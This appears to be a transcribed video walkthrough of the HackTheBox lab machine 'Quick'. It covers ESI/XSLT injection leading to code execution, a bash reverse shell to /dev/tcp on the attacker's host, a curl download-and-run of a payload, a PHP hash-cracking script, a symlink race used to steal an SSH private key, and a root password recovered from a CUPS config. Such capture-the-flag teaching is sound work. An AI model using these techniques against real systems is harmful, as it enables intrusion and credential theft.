What's going on YouTube? This is Ipsec. I'm doing quick from HackTheBox, which was a super fun box because it was very challenging without being too technical. You didn't have to build any complex SQL injections, buffer overflows, or anything during this box. Instead, there's 5 different websites running on 4 different web servers that you have to get a bunch of information around to kind of put all the pieces of the puzzle together. The coolest piece of the puzzle is there's a web server out there that's running HTTP version 3, which goes over UDP and not TCP, and I couldn't even get my Firefox, Burp Suite, or curl to use that. Instead, I pull an application called Quiche from Cloudflare. That's a little command line HTTP utility that you can use to hit that web server and get some good information off of it. So with all that being said, let's just jump in and do this box. As always, we're going to begin with an Nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the Nmap directory and call it quick, and then the IP address, which is 10.10.10.186. I'm also going to put a sudo before Nmap because Nmap always likes being ran as root. And of course, I've already ran this command because it can take a little bit. So let's just take a look at the results. And we have just 2 ports open. The first one is SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 9001 running Apache HTTPD, and of course it is Ubuntu as well. And since this is a weird port, I'm going to run a full port scan. So let's do sudo nmap -p -10.10.10.186 -oa nmap quick all ports 10.10.10.186. So let that go run, and let's just take a look at the page. So 10.10.10.186 9001. And looking at the page, we have some text, testimonials, but before I go too far into the page, I always like viewing the source with Control-U and seeing if I can see anything I recognize. Something being like /wp-admin indicating it's WordPress. So we can see there is a login.php, so we know this is hosting PHP scripts. We could go back here and confirm that with index.php. And we see we get a page. If we tried index.html, guessing it doesn't work. So let's go and run gobuster. I probably should have added a -v here so we saw open ports as we find them, but oh well. I'm going to do gobuster -u for URL, HTTP 10.10.10.186, port 9001 -w for word list, user share word list, gobuster, then directory list 23 medium, -o for out file, gobuster -root -php, and I'm going to do -x for extension and put PHP there. And I have to put this in dir mode for gobuster. So that should be a good command. Let this run, and we get a bunch of pages. So we see search home login.php right away. Going here, we have this about that's not clickable, so maybe there's an about.php or a contact.php. Looking at this portal link, we see portal.quick.htb. And then clients, clients.php. So going here, we have client names and countries, codes, or countries. So based upon this, this is kind of weird that they went out of the way to specify the country, so I'm guessing this could mean something down the line. Yeah, so have some timeouts. That is unique, but should be fine. Let's see, what was I going to do? We want to go probably check out like search.php. It's a blank page. About.php doesn't exist. Contact.php doesn't exist. DB and home. Let's try db.php. Something there. Home.php, invalid username password, and we get to login.php, which wants us to log in. I just remembered what I went back to my host for. I wanted to add a link to portal.quick.htb in my host file. So let's do sudo vi etc host and add the entry. So 10.10.10.186, and that's going to be portal.quick.htb. And I always like putting the quick.htb, the, I guess, one level up of the domain, because who knows when it'd be helpful. Sometimes it is, sometimes it isn't, but it's a pain to debug when you don't have it there. So we have that. We can try going to the URL. It's not going to work because 443 isn't open. We can try just going HTTP portal.quick.htb on 9001 to see if we get anything different, which we don't. So we can try quick HTTP on 9001. Don't get anything as well. We can try building out emails for Tim, Roy, Eliza, or Elisa, and James. And it specifies what company they're with. And looking at the, the clients page, specifies the client and the country. So you could also Google like country TLD codes, because I'm guessing we need to put some type of valid email. And I was thinking, like, if we go to /login.php, send this over to Burp Suite, and put like a email that definitely doesn't exist, like root@ipsec.rocks, with a password, of course, of please subscribe. And I'm just typoed that horribly, but doesn't matter. Submit it, send it to repeater, and send a request. Hopefully, something will change with this. We see this as 310 bytes, and if we put a valid email here, maybe it'll be more or less bytes, or this will say like invalid password instead of invalid credentials. Other thing I noticed that's odd is it says X powered by Esigate, Esigate. So if we Google exploits Esigate, we have some type of injection here. And this is going to be for a later part in the video. I don't want to go over this because if I keep jumping back and forth, could be confusing, but that's when I started reading this. If you read this, you'd realize it's probably not applicable yet, but you'd keep it in your back pocket. So always do recon and look for things that stand out at every step and just take notes of them. So let's try building a valid email. The emails, and we have to put all the people. So let's go to the clients. And let's see, quick. 9001, Tim, Roy, Eliza, and James. So Tim, Roy, Eliza, James. And I'm only going to do the first word. If I was doing this like on an actual engagement for like Darkwing Solutions, I'd probably do like Darkwing Dash Solutions, Darkwing something. Or I'd actually go and query the domain, look at LinkedIn to see if Roy does work there. So a lot of ways to identify valid emails if this wasn't a CTF. But for the sake of a CTF, just going to pick the first word. So he is Q Consulting. Roy, he could be 2. I'm not sure if that was a typo. So I'm going to do Darkwing and at Dark WNG because it's WNG there. Wing here. So it's probably a typo, but it's going to keep that. Eliza at Wink, and James at, it was like Lazy Coop. I'm going to keep this all lowercase. Email shouldn't matter. So Q Consulting. For each one, I'm going to do their TLD and .com. So .co.uk, because he was in the UK. And .com. Roy, I think this one is a US. So we'll do .us, .com, .us, .com. Eliza Wink is UK. And we'll do .com here. James Lazy Coop. And Lazy Coop is China. I always get China and Switzerland's TLD confused. It's China here. Oh, that's not TLD code. List. List is what I wanted. So China, I think, is .cn. Yep, .cn. I always get China and Switzerland confused because Switzerland is CH, I believe. Come on, Switzerland, where are you? .swiss. BE, yeah, Switzerland is .ch as well. So I always get those two confused. I'm not sure why, but LazyCoop, CN. This can be .com. So we got a list of 10 emails. So I'm going to do wfuzz-h for the help. Let's see, -u is URL, HTTP 10.10.186.9001/login.php. -d is for post data. So if we look at the login request, it's here. So email and password. Email is equal to fuzz and password is equal to please work. And we can launch this. And we must specify a payload, so -w emails to do a word list. And everyone is the same. We can't tell what's different. So at this point, I'm going to do a proxy. So wfuzz-h grep proxy, grep-i proxy. So it wants IP port type. So let's do wfuzz 127.0.0.1 8080 HTTP. Go over to burp, and let's just make sure the wfuzz is working. Maybe it wants caps. Okay. So looking at this query looks correct. We can send it over to repeater, and we get the same exact thing. So we don't have a valid way of enumerating emails yet. And if we can't enumerate emails, I don't want to go try brute forcing things, because brute forcing something that may not exist would be painful. So let's take a look. We got portal.quick.htb, doesn't work. Login, nothing there. Going back to gobuster, there is ticket.php, so we could go 10.10.10.186, ticket.php, and it brings us back to a login page. So reading this, we see we are migrating a portal with the latest TLS and HTTP support. So if you go Google latest HTTP version, let's see. It's on 1, 2, there is a 3. If I just Google, HTTP version 3, I said because it kind of appeared in the search history or search recommendations. And we go here, and you read this Wikipedia page, you would see HTTP 3 is a draft based upon a previous RFC, but it's HTTP over Quiche, Quic, which sounds like Quick from the machine name. And it's developed initially by Google, but goes over UDP. So let's go take a look at UDP. Nmap finished of all ports, didn't have anything. So we could do nmap-su, maybe. I'm not sure if this will work. UDP is always iffy when you do nmap. I'm also going to add the -v flag. And if you tried netcat, -v 10.10.10.186.443, we have to do -u for UDP. You may be like, huzzah, it's definitely working. We're connected. But keep in mind, UDP is connectionless. So if you specify anything here, like 9001, it's not going to work. It says the same exact thing. You can do nmap. So sudo nmap-su for UDP, 10.10.10.186-p 443 80 9001 22. Let's try this. And we see they're all open/filtered. I was hoping one wouldn't be. Let's try 444. Sudo nmap-su. So maybe there's a firewall in play, because if we specify a port that isn't supposed to be listening, it immediately says closed. Why is 9001 open? It's 9002? So we can see this nmap scan with UDP is not the most reliable. It's showing different things pretty much every time, and we need root, so not sure exactly what's going on here. the easiest way to do it is just to test it. So we could try like going over to Firefox, about config, and enabling HTTP 3, but that's not going to work because I think the web server has to be listening on 443 TCP and then redirect you to this for Firefox to pick it up. We could try curl. If we go back over to this terminal, curl-h grep HTTP3. There is an option. If we do curl-HTTP3, HTTPS, portal.quick.htb, we see the libcurl version doesn't support this. And I think the way you get this working is manually compile curl, but I always hate manually compiling a program that my OS package management handles. So I'm not going to go that route. I'm going to build a special package just because it seems the safest to me. Whenever you start replacing packages that the apt or yum or DNF, whatever package management you're using has, weird things can happen. So I'm going to Google quick HTTP3 client GitHub and see what comes up. The very first result is Cloudflare Quiche or Quiche. I don't know how to pronounce it. It's probably Quiche. It's probably how you spell quiche. I don't know. Let's see. Is there build instructions? Looks like there is. So git clone recursive. So let's do this. And whenever I install a package from like Git or something, I always put that one in /opt. So I'm going to let this command finish. Now that that's done, we can go in the directory. The next thing it wants us to do is cargo build examples. I'm going to make sure we have cargo installed. So sudo apt install cargo. And it looks like it is already installed. So cargo build examples. And this can take a while. So I'm just going to let this one run and speed up the video. And it looks like it didn't work because we need cmake. So I'm going to do sudo apt update and sudo apt install cmake. Probably should have added a -y so it auto accepts the prompt when it comes up. But let's install cmake and then we'll try this cargo command again. Cmake is installed, so let's do the cargo build examples. And this one can take a while, so I'm going to speed up the video yet again. It's a lot of editing for me to do around this time. So it looks like it has finished installing. So let's go into target, debug, build. And that may not be it. Probably target debug examples. And we have HTTP3 client. So let's try executing that. And it wants a URL. So let's do HTTPS portal.quick.htb. And we get a page. And right off the bat, I notice there's a view equals docs in this index.php thing. So the first thing I want to do is let's kind of dirbust this a little bit, like docs.php. We get a 404. Let's just try /docs. And we get a 301. So there may be documents inside of /docs. About, not sure there, but the main thing I was looking for is if about.php existed, because what a lot of applications do when I see view equals then a word that looks like a page is it's just a include statement and they append .php. But since I can't find the file that this is, I'm going to ignore doing LFI things for now, because this may just be pulling from a database or something else. If I ever can find out that it's for sure pulling from a file, that's when I try local file inclusion. Or if I'm just running against a wall and don't have anything. So nothing up top there. So let's try looking at view equals contact. And we could also save this to a page. So this could be like contact.html. And then in Firefox, we should be able to open this page. So root HTTP, not root, home users or home ip htb home ipsec, my bad. Home ipsec htb quick, and then go to, am I in the Nmap? What direction am I in? Oh, I'm in opt quiche, whatever. So let's do move contact to HTTP quick. And then we can open up the page and see what it looks like. ABC, A, ABC. Let's send this over to Burp Suite. Submit. I don't know what just happened. It tried to submit to itself. Not sure. We have a way to submit stuff to a page, so we may have to look into that more, but let's just go see what else there is. There is about, so index.php equals, question mark, view equals about. And we have more emails, John, Mike, Jane. So let's go back here, v emails, was it John at quick.htb, Jane at quick.htb, and Mike at quick.htb. And we can try these emails. So wfuzz, is there a -d? I'm not sure what window I did that wfuzz in. We'll just redo it. wfuzz-u http 10.10.10.186 port 9001-w emails, and then -d email equals fuzz and password equals please work. And that definitely is not it, because I'm getting something completely different. ls emails is there. Let's try going back here. Repeater tab. Email equals password equals login.php. I did not specify login.php. There we go. And they're all still the same. So those emails did not help us one bit. We can go back here and try the last page, which is view equals docs. And we have two documents, quickstart.pdf and connectivity.pdf. So let's do docs quickstart.pdf. And let's just direct this to a file, quickstart.pdf. And then the other one was connectivity.pdf. Okay. Let's open up a file browser. We can probably just do this in this Firefox. Move star.pdf to HTTP boxes, HTTP quick, connectivity.pdf. Once the browser is up and running, go to quick login.jsp, and we can use this as the default password. So let's save this, and I'm going to look at this link. It just goes to quick.htb. Let's take a look at the other page, which was quick start. And we don't really get anything. So let's go back to our wfuzz and use this password. So wfuzz and put this password in. And one actually gets us 302 redirect. Eliza at wink.co.uk. So let's go back to the login page at 10.10.10.186.9001. Have to tell burp not to intercept. And hopefully you can't hear that rain outside. It is storming bad by me right now. But let's try logging in. And what was that password? We can grab this password, log in, and we get a page. We can track your tickets. So let's see what we can do here. These are not links. Don't have anything there. We can raise ticket, home. We're logged in. And I'm not going to run another gobuster because it's obvious we're on the same site. I don't know why. Oh, that's Nmap. Because now when we go to probably search.php, we can actually hit something. If we do search.php, please provide a search item. So with the PHP session, we can now access the pages we couldn't before. So there was also db.php and ticket.php. So db.php, you normally can't access db or database.php or config.php on any website. Was it ticket.php? Where you can submit a ticket. So let's go back. We got track ticket. So let's do test, and we'll look at this one in burp. And then I'm going to just click send. 200 OK, we don't have anything. So I'm going to do single quote like that. Or 1 equals 1. Seeing if we can do any basic SQL injection. Just things I test. And doesn't look like we get anything. But I probably should revisit this when we actually have a response. So let's go create a ticket. We can turn intercept off. Test, and just click submit. Ticket 9792. So if we do search here, not sure why that's not working. We can do this, ticket 9792. Nothing. What? See, proxy. Oh, intercept was off. Okay. Send. And we don't have anything. We don't have a cookie anymore. I don't know what just happened. Home. Okay. Intruder, intercept on, click on home. Okay, we got a cookie. Click search. Doesn't have the cookie. Oh, it's going to quick.htb, and we're not. So this is some weird browser protection. Let's log off real quick. Or log off by just going to quick.htb. Unable to connect. Do we not add that in the host file? etc host. I did. Oh, 9001. I'm flailing all around right now. I'm going to compose myself. So this should fix that. So get started to log in. Eliza at, what was it? Got emails, wink.co.uk. And then the password, where is it? Here's the password. Probably should open up Cherry Tree or something and log this. Okay, so now the URL is quick.htb. So when this does some weird web request, it'll actually put the cookie in. 0 results. Yep. So that's what I expected to see. So if I turn this proxy back on, when I click that, it now puts the cookie. And again, the issue happened was I was on a page called 10.10.10.186, according to my browser. And then it was sending me to quick.htb, which is a whole different domain in terms of cookie storage. So I didn't have a cookie to quick.htb. I had a cookie to 10.10.10.86. So my browser did not send the cookie when I click search. So for now, we can just click copy this, paste it here, and click go. And we can retrieve that ticket. So the first thing I want to probably do is brute force tickets. So let's go back to wfuzz. So wfuzz-h grep-i cookie. And wants B for specify cookie. So let's do B like that. And we'll do -u for URL, http quick.htb port 9001, -w word list. So we're going to have to create our own word list here. So let's do v word list gen.sh for I in sequence -f, and we'll do ticket is 4. So %04G, I think. 0 and 1000, or 9999 is what I want. So what that just did was if we, do sequence 0, 100, you can see how it prints it out. If we do sequence -f for format, %05G, it now pads, or 04G, I should do. So it puts it in the format of a ticket. So that's what that did. We can just do, that's how I like doing my bash loops. Echo I, done. So bash word list gen 2 word list. And I'm sure there's probably a way I could have done this in wfuzz, but I don't know wfuzz's syntax off the top of my head. Let's see. We gotta go to HTTP quick. And let's see. This is going to be search.php. Or is it ticket.php? Search. Search equals tkt-fuzz. And when we get to 9742, we should have something. Let's see. grep word list 97, or grep 97 out of word list. 2 short. So to save time, I just did it this way. And let's see, 9742 looks exactly the same. That shouldn't be the case. TKT. So let's send this back over to Burp Suite. So 127.0.0.1 8080 HTTP proxy go cookie php/id looks good. 9742, and we don't get anything. Let's raise a ticket. Test. Okay. 4732. So we'll search this 473. Run this again without the proxy. Okay, that's what we wanted. So we want to just hide everything that's 53 or 15 words. So I'm just going to do --HW 5. And now we're only getting the ticket we have. So this is going to enable us to view all the tickets in the help desk, as long as we have permission to see this. So word list, and it's going to fuzz them all, and it won't really get anything. So this comes back to the X powered by thing. We go back here. So it's Esigate. And the other thing I'd probably do 4732 is try a bunch of like SQL stuff now that I know what a valid query looks like, but not going to get anywhere with that. So let's go look at this Esigate. Esigate exploit, turn burp off, and go in here. And let's see. So this is XML any injection. If we go to ipsec.rocks, XSLT, bootstrap XSL, that's not it. XML entity. These videos would probably help you. DevOps, patents, and Monteverde. But we're just going to copy this payload. And we're going to create a ticket with this payload. And this is kind of like middleware to make applications work together or something. But if you had read that whole thing, which I'm not doing because it's a video and it would take like probably 10 to 15 minutes and it's not entertaining to watch me just scroll. So put our IPs here. So 10.10.14.2 slash, this will be, what was this example? Do they have anything? News.xml. This will be pwn.xml. And then this, evil.com, 10.10.14.2, esi.xsl. So we can create this ticket, 1933. So if we search for TKT-1933, we don't really get a response back. We go back into burp, TKT-1933, we get connection refused and this weird bad gateway message. If we go back to our host box, nclvnp 80, sudo, we get a connection. So we know we have some type of execution here because we can force this web page to connect back to us. If you keep reading this, there is a RCE. So let's try this. So copy this. Let's paste a new ticket. Submit 3581. So go back to burp. 3581. And it just goes and gives us this whole thing. So, I'm trying to think of a good way to explain this. XSLT, these are transform files. So if you just go straight here, it's not going to work. However, if you do it within a XML entity injection attack, then it can be executed. So if we change this style sheet out to be this page, it'll work, or it'll hit it. So we should have copied this to our local box. So make dir dub, and this is where I said it would probably help if you viewed the other machines of doing XML entity injection, because this one is relatively advanced. So we called it esi.xsl, set paste that in. Okay. And then we go back up here, or we can probably go into burp, proxy history, and let's go to a post. Where is it? Was it not intercepting? May have not been. So let's go back here, raise ticket, exploit, and this can be 10.10.14.2. I don't know what we called it. pwn.xml. And 10.10.14.2 esi.xsl. I'm just going to put this in burp so it's in my history tab. We can turn repeater off, which is, or not repeater, intercept. Submit 3838. Go back here, repeater 3838. Connection refused. So let's set up a web server. I'm going to touch pwn.html real quick. Python -m HTTP server 80, and we have to do it with sudo. Python 3. And let's see. Get esi.xsl. Pwn.x. What was that file not found? Looks like it did 3 requests. And eventually landed at a file not found. And now it's getting this whole URL. That's weird. esi.xsl. Instead of touch pwned, I'm going to do, let's do curl HTTP 10.10.14.2 and success. So if we ever see the server hit our web server with success, we know it worked. So try this again. And it keeps doing a whole GET request on this whole URL, which is weird. If we do sudo nclvmp 80, we can see what I'm talking about, GET, and then this. And not sure why the web server is doing that. If it's seen that file before, then it does this. So if we created a new ticket and did it, it wouldn't do that. We can go to the proxy, history, post, change this ticket. We'll change the ticket name to leet. So ticket 1337. Okay. Go back to our web server, and it'll be the same files, and it's probably going to get just the XSL this time. So let's go back here, ticket 1337. I'm not sure why I didn't do that. I wonder if we have to rename this whole file, but instead of debugging this, weird thing, PHP will actually return the file. So if we do sudo php-s to be this web server, it's still going to do that weird GET request. As you can see, it's getting this, but it actually returns. So that's good. Pwn.xml not found. I have pwn.html, so pwn.xml. And if you really wanted to and didn't believe me, we can Wireshark this and look at this GET request. Because I am baffled at what goes on here. I have something going on. gobuster still? gobuster is still running. Cancel that. Start back up. And we can go to burp, run, and look at the requests. We're doing a GET on /success, which is good. So follow this request. And you can see it gets this whole thing, but the PHP web server is like, I knew what you were doing. I'm just going to get rid of this and give you this /esi.xml or XSL. So handy to know how tools work and ways around quick problems. We could have wrote a Python script to always return this file upon a fail, but yeah. I don't know what just happened there. Reset. Okay. I'm not sure why it opened up in links, but okay. So we have a way to execute code. So let's go back to this XSL file. Type reset here. Kill the pane, open the pane. There we go. So let's go ESI, and let's try executing a reverse shell. So we can do cdata is equal to bash -c bash -i. Was it 0 and 1 at the end? Like this. I think that's it. Let's do bash reverse shell. You think as much as I type this, I'd 100% get it right every time. But every now and then I don't. So bracket like that. Yep, that's good. So save that. We did 9001, right? We did not do a port. 9001. And try to run this. And we don't get a shell. So we can try editing this again. And instead of pipe passing like this, I'm going to lower the bad characters. And we're just going to do echo this as base 64. I don't like that plus. Can we get rid of that somehow? Okay. Okay. I'm just adding spacing. There we go. So no special characters in this base 64. If we echo -n base 64-d bash nclvnp 9001, it works. So now we can do, I'm gonna try bash -i real quick. Okay, that's probably what I want to do. So we can copy this and try this command, because this has much less special characters than the previous one. ESI, XSL, put that here. Okay. Then we can try executing it. And we still don't have a shell. So, bummer. The last thing we can probably do is drop to box. So I'm going to do bash -c, bash -i, dev tcp 10.10.14.2, 9001. esi.xsl, and we're going to go back to the curl command that we had working before. So we can do curl 10.10.14.2 /pwn o temp pwn. Send it, and we see it had downloaded pwn. So we can edit this script again, and this time, just execute temp pwn. So I'm guessing what it didn't like was the pipe character before. And that's probably why the reverse shell did not work. I have a typo. V bone bash. So we have to, do the curl again. Curl 10.10.14.2 pwn. Saved it. Okay. And now we should be able to bash and execute. But what I was saying before is This is probably a wrapper around like system like this. And then it's putting a comma here and doing arguments. And the special characters like the pipe and stuff won't work when it's in an argument form. So that's probably why the reverse shells we were trying did not work, because we do a bunch of special redirectors. And that's just not how, oh god, it works. So save it, listen, execute. Maybe it didn't like overwriting that file. So hit you a bunch. I guess I should not have explained it because you erased my history. Girl 10.10.14.2 temp. Sorry. I feel bad whenever I fumble around this much. Cat pwn. Bash is right. Okay, that looks good. So it downloaded pwn but saved it as sorry. And now I should just be able to execute it. Did not execute. V pwn. Bash pwn. We get the reverse shell. So the weird thing about this is I'm just going to move pwn to sorry. Before I was actually getting the netcat connection, but it just didn't work. You can see right here. When I renamed it to sorry, it just didn't do anything. So I'm not sure why that happened, but we probably should rename this to please work. Okay. So let's go back into the XSL. This piece of the video is taking much longer than I thought it would have. Curl 10.10.14.2 please work temp. Oh, I didn't do -o. That's what I forgot. That's probably what I forgot before too. So now we can just do bash. And we get a shell after way too long. Oh well. I probably should have ran script before I did this shell, but I'm not going to go back and fix it. It's good how it is. Script would allow me to log all the commands. So python-c import pty dot spawn bin bash. Oh god. I screwed that Python command up, and now my terminal's dead. cd www on this PHP web server. Make dir shells. Script sam.log nclvmp 9001. Run it. Now we can do Python import pty spawn bin bash. Who am I? I wonder if I screwed up my standard out or something. Because that should work. Yeah. Which Python? I probably forgot the bash-i and please work. cd www. Oh crap. Well, at least you know what happens when you forget that piece. Oh, okay. So vesi.xsl. Curl 10.10.14.2. Please work. -o. Okay. Bash. /temp. I need to put /temp here. I should just, at this point, have multiple of these files so I can stop editing it like this. Shell. And I really hope... Okay, now it works. Python-c import pty, pty.spawn, bin bash. There we go. stty raw -echo, hit fg enter, enter twice, and now we have a shell. And this time, for real, I can get rid of that annoying thing. So export term is equal to xterm. Now I can clear the screen, and we can begin. Normally, I'd run linps or linenum, but I fumbled around enough, so let's just manually look at things. Find dot, and that Esigate is noisy, and something's weird with my terminal. We may want to set the rows and columns at some point, but I'm going to do grep-v Esigate to hide that. And we can also add a -ls to show file sizes and things like that. As when I forgot to put the /temp, it's saved there. We have bash history going to dev null, so that's not there. But we do have a MySQL history of March 20th. So if we edit this file, we can see it's using the quick database and just dumping the users, it looks like. Users.text. So not too much. Let's go var dub. And there are 3 directories, HTML, jobs, and printers. So if we look at HTML, there's a view files. Look at jobs, there's nothing. Look at printer, we have a few. Add printer, DB, home, job, whatever. So let's go into XXE Apache 2 and grep-i printer or -R printer. And we can see inside of default conf, we have a document root of var dub printer, and the server name is this. So if we cat this file, you could see exactly how it's configured. We can see virtual host, anything on port 80, go to var dub HTML, anything on 80, go to, wait. Oh, so this is on port 80. There should be a 443. I guess maybe that's the SSL. Hold on. Sites available. Okay, yeah, default-ssl.conf. This is probably... What's listing on port 9001? It was Apache. Or port 9... grep-r... What port is it? Yeah. 9001. It's Java. What? Oh, so it's got some Java. That's what Esigate is. So this is some middleware, and it's passing it to this Apache. Okay, that makes sense then. So I'm guessing once we're root, we could find that easier. psef grep esi home sam Esigate distribution. Is there a comp file here? cd apps cat Esigate.properties grep-r 9001. So something on Java is listening on port 9001 and directing people to Apache, which is on port 80. So that's how the HTTP config is working. Oh, that was confusing. So sites available. So if we look at default conf, virtual host 80 doesn't have a host name or anything, and that's going to var www.html. And if we look here, this one server name printer v2.quick.htb, and it's going to var www printer. So I bet if we copy this and go into our host file with sudo vi etc host and put this new domain in, maybe it'll work. We probably have to do port 9001, and we get a sign in. So we could have also probably logged in through SSH or used Chisel to do a proxy and accessed it on localhost 80. But we can use the Esigate middleware to direct us to port 80. Email address, we can try Eliza at whatever it was. Forgot a password. Or email and password. So it helps to do notes. Paste that, and we can go back into Firefox. File quick start. It's probably file connectivity. Here's the password. Paste. Turn burp on. Intercept on. Log in. Repeater. Invalid credentials. So we could go back into wfuzz and do this again. However, it's looking very much the same. So we have to get someone's password. And if we looked at that history file from MySQL, it's probably pretty obvious we have to go into the database to log in. So var www. I mean, the other thing we could do instead of trying to get credentials is looking at probably index.php and seeing if there's a SQL injection. We can see this is using parameterized queries, or prepared statements, whatever you want to call them. So probably not SQL injectable from just quick glancing at it. And we need SRVADM at quick.htb. So let's cat db.php, and we can see it goes to the quick database. We can also go HTML, db.php, and it's doing the same exact thing. So both of them go to the same database. So we can do MySQL-u, db_adm-p, db_p for SS. Use quick, select stir from users. And we have Eliza and SRVADM. So here's a hash. It looks like MD5, echo-n, wc-c, 32 characters. So most likely MD5. Try to Google it. And we don't get anything. We can try hashes.org. What? Huh. So I guess the site's been down for a while. Track station? and try going here, copy hash, log in, stairs, crack. We don't get anything. So let's take a look to see if this is actually MD5. So I'm going to save this, vhash, paste, and let's go printer. Let's look at this login function. Let's see. Let's fix the TTY real quick. STTY-A 34136. STTY rows 34, columns 136. There we go. Let's see, vim index.php, so I have colors. So let's see. Email, password. So it's doing MD5 crypt password FA. What is that crypt function? PHP-A. So let's do echo crypt. Please subscribe FA. Okay, so it's not just appending. If for some reason that was just appending FA to the password, then what I would do is probably use hashcat and do a custom rule file. So I'd go through rocku.txt and probably do a rule file that consists of $F to append F to the string and then $A to append A to every character. I'm sure I've done that in a video before. ipsec.rocks hashcat rule. I don't know. I thought I've done that before. Maybe not. But we can't use a hashcat rule file anyways because crypt is mangling the password big time. So I guess we have to create our own brute force script. Quit cat hash. So let's see. And create brute.php. And the reason why I'm doing it PHP is because that's what the crypt function is written in for the website. So hash is equal to the hash. Word list is equal to user share word list rocku.txt. And then we can do for each word list as word echo word. Let's see if this works. PHP brute invalid argument supplied for each. Oh, this probably needs to be word list is equal to, is it file get contents? I was trying to debate if it's f open or file get contents. Still invalid thing. This may not be an array. So let's do explode to turn it into an array. And explode it based upon line break. There we go. So I don't have a /n to do a new line, but that works. So now we can do attempt is equal to MD5 crypt word FA. And if hash is equal to attempt, it's PHP, so let's do secure coding and do 3 equals to signify also the same exact type. This will be echo correct word. You join strings in PHP with periods. And this should be in parentheses. I think echo actually works with and without parentheses in PHP. I think that's good. We may want to exit 0 and there we go. Put semicolons everywhere and run this and hope it cracks. And it looks like it did. So we have YL51PBX. So if we go back here, let's do printers. It was SRVADM at quick.htb. Paste the password. Click login. Come on, server. Respond. I wonder if that's waiting on like a responder request. Go here. Let's unmask this so I can copy it. Paste. Log in. Invalid credentials. SRVADM at quick.htb. SRV. Maybe I did SVR. Quick.htb. That is what I have as the password. I wonder what check me out does. Huh. Go back here. SRVADM at quick.htb. Yeah, invalid credentials. Copy. Paste. ADM. Wow. The mistakes you make when you just do something for a long time. Can't stress enough how helpful it is every now and then to just take breaks, go like exercise or something, and come back to the problem. You'll be surprised with some of the things you overlook. So log in, and we get this picture. We go to printers. No printers have been added. Please add one. So let's call this IPsec type, only network, profile, default. We can put our IP address, 10.10.14.2, add printer, and let's listen on 9100. Go back to printers. We can print the job. Printers up, please add a job. Please subscribe to IPsec. Print. Cannot connect. We already got a connection. I'm going to do the -K option to leave the connection open after something happens. Job assigned. And we got something printed. So we have to now probably look at the logic on how this sends it to port 9100. So let's go look at some PHP code. Add printer, probably not there. Printers.php sounds good. So prepare, select IP port from jobs. Can't connect. So maybe add job. How does it create a job? So v job.php. So it's doing a file put contents. and then chmodding it to 777, and then preparing. And for actually printing, it's doing a file get contents on that file. So we can probably just put a symlink over top of the file. So let's see. Let's go ... jobs for I in sec 0 100 do echo ls. Done. I don't want echo, I just want ls. Okay, so let's do some, I guess, sleep 0.2. We could also do GoSpy, I believe it is, or PSPy, to look at file creation events on the file system. Print. So that's the name. So let's see. We got to create a script to, upon finding a valid name, delete the name and symlink. So let's do vi, or we can do it here, vi print exploit.sh for I in 0, sure, do. Sleep 0.2, sure, x is equal to ls, done. So make dir temp, cd temp, touch t. So x is equal to ls, and x is now t. So we just verified that that logic will work. So what do we call this? Not wordless gen, print exploit. So rm, we should probably do paths, var www jobs. rm var www jobs slash x. Add a -f so it doesn't ask us. ln-s root ssh id rsa to var www jobs, like that. And we probably don't have to do it this way. We could probably just manually add in the database to print something. Maybe I'll look at that after this. That should work. So let's try this. It's either going to work or fail horribly. nc btest.sh. Probably should put it up one directory. Probably can't write it there. Let's do dev shm. Paste. Bash to execute it. Oh, can't remove because it's a directory. Well, it's got IDRSA there now. Test.sh. Oh, God. Exit. Cat. ln-h. Help. Let's see. Let's just do ln hash link, cat link. I don't know why it created the file. Oh, no. Yeah. So it probably created the file IDRSA because X was blank. That's fine. Let's just try this. Probably should have my netcat running. and assign the job. So try it again. Maybe we should send this over to Burp Suite so we can send it multiple times. So proxy, send, repeater, see, is this actually working? Go. Yeah, but our script is not. Test VA. So maybe something's wrong with test.sh. Let's take this sleep out and just do this quickly. So I did Windows key left and Windows key right to change the sizes. So I'm going to hit that and go. That is way too quick. The terminal window is screwed up. Windows key up to maximize it. And we probably need, let's see, 0 to 9 star like that. And let's see, bash if then, turn Burp Suite off. Let's see. We should just be able to do if x like that, then fi. This probably just upset a lot of people. I did both a combination of tabs and spaces. Upset myself with that one. Let's try this. Bash test.sh. We can get rid of this 0 to 9. Sweet. Okay. And I'm also going to do lsla var dub jobs. Before and after. Okay. Left. Like that. Run. Send. Let's try maybe not symbolic. Or maybe this file doesn't exist. The SSH key file. It's probably what we should have done in the first place, is done a file we know exists. So etsy shadow. Operation not permitted. So can't do it that way. We need that -s. So ln-s, that was needed. Let's see. Maybe this doesn't read as that user. Let's see. That could be it. cat etsy passwd. Do we have other users on this box? PSE SRVADM. Shoot. Home SRVADM. So /home SRV ADM or admin? ADM. ADM.sh IDRSA. Let's see if we have his SSH key. That's frustrating. There we go. So now it worked. So if we grab this, v srvadm.sh, paste the key, chmod 600 on that key, sh-i, key srvadm at 10.10.10 186. Yes. And we get in as this user. So if we do a find dot to see what files exist here. Let's see. Bash history is to dev null. And everything is March 20th. But the cache directory is interesting because it has logs. So let's look at logs. Cups is the printer log. So let's see. Is there anything cool here? I don't know a quick way to sort all that, so nothing looks good there. Debug. Error. Nope. Internet printing protocol. That's funny. grep-i password. Nothing there. Let's go to conf.d. Let's look at cups. And there's a lot of stuff in this. Look at printers.conf. And we have this Konica Minolta at device URI, server admin at, looks like a password, at printer v3.quick.htb. Let's go over to burp suite so we can decode this quickly. Because I'm guessing those %3f %26 is HTML. Let's see, we got a password. It says sudo. Oh, okay. That's not it. Try su. Is this the root? And it is. So that is the box. Hope you guys enjoyed it. And I guess the last thing I want to do is look at this portal index.php real quick. Oh, shoot. It is lfi.html. Oh, man. So if you remember a while back in the video when we were exploring the, what is it? The HTTP 3. I was looking for files, and I guess we can go all the way back there. Opt. Quiche, was it? Examples. Debug. Wasn't that? Target. CD target debug examples. It was this. So if we did HTTPS quick portal.htb, HTTP3 client. What? Portal quick HTTP. This is what I was talking about, LFI. And we tried like contact.php. Didn't work. It's contact.html. And yeah, that's the file. So going back it's still not vulnerable to LFI because we don't have any user input control here. The user input is on this, and then it's doing static strings. So in most LFI examples, what they would do this would look something like this. If view equals contact, I mean, you wouldn't even have this. You just have delete this, and it would be file get contents, get view dot HTML. This would be how like vulnerable to LFI things are coded, because then you have user input in this file get contents, and that's when you could do like the dot slashes and things like that. So that'll be the box. Hope you guys enjoyed it. Take care, and I will see you all next week.